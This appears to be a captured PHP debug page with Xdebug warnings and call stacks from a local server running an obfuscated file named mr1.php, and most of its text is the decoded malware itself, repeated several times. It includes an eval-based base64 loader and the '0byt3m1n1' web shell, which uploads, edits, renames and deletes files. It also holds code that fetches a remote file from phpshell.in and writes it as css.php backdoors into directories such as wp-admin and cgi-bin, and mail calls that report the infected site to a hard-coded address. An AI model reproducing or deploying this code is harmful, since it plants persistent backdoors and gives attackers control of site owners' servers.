Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.4042541968fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:168
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 169
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.4062541968fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:169
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 170
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.4079541968fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:170
( ! ) Warning: mail(): Failed to connect to mailserver at "localhost" port 25, verify your "SMTP" and "smtp_port" setting in php.ini or use ini_set() in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 179
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.4096542288mail ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:179
( ! ) Notice: Undefined index: query in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 182
Call Stack
#TimeMemoryFunctionLocation
10.0003406416{main}( )...\mr1.php:0
20.0004408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0018521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1